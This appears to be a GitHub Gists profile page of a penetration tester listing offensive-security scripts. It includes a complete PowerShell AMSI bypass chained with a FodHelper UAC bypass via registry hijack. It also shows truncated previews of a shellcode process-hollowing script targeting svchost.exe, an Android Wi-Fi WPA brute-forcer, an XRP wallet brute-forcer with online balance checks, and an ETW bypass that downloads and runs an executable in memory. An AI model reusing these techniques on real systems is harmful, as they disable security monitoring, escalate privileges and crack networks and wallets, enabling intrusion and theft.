Razz LongWayHomie

OSEP, CRTL, OSCP | Penetration Tester

22 followers · 7 following

gov.pl
Warsaw
18:09 (UTC +01:00)

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

LongWayHomie / UACElevate-FodHelper-AMSI.ps1

Created November 16, 2024 17:22

Script to bypass AMSI in PS and use FodHelper to bypass UAC

	#Bypass AMSI
	$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
	#UAC Bypass
	New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "C:\Users\bfarmer\Desktop\ph.exe" -Force
	New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
	C:\Windows\System32\fodhelper.exe

LongWayHomie / DynWin32-ShellcodeProcessHollowing.ps1

Created July 14, 2024 08:19 — forked from qtc-de/DynWin32-ShellcodeProcessHollowing.ps1

PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions

	<#

	DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
	dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
	GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
	and GetProcAddress to obtain the addresses of the other required Win32 API calls.

	When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
	and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
	and the shellcode is executed enveloped within the trusted svchost.exe process.

LongWayHomie / mjolnir.sh

Created March 16, 2024 20:26 — forked from Celestial-intelligence/mjolnir.sh

Bash script to BruteForce Wi-Fi networks (WPA-KEY) without external adapter or monitor mode on Android devices. Will add feature to brute WPS too in the future.

	#!/bin/bash

	# ATTENTION!!!
	# Highly recommended to use with https://github.com/beardache/WiFiMap or https://forums.kali.org/showthread.php?23080-adstar-Wordlist-Generator-v1-0 (this one gives passwords quick right from stdout ;)
	# Attached version of wpa_cli binary was compiled for armv7 architecture. However you can find your architecture version in the internet.
	# Forked from https://github.com/rasta-mouse/Mjolnir

	### text colours ###

	red='\e[0;31m'

LongWayHomie / xrp-smasher.py

Last active June 10, 2023 22:34

XRP Wallet Brute-Force (with online balance check)

	from xrpl import wallet
	from xrpl.core import keypairs
	from xrpl.clients import JsonRpcClient
	from xrpl.account import get_account_info
	from xrpl.account.main import get_balance
	import requests
	import time
	import os

	def create_wallet():

LongWayHomie / ETW_Bypass.cs

Created March 14, 2023 16:59

ETW Bypass to download the EXE file from web server and run it from the memory

	using System;
	using System.IO;
	using System.Reflection;
	using System.Runtime.InteropServices;
	using System.Net;

	namespace ETW_Bypass
	{
	internal class Program
	{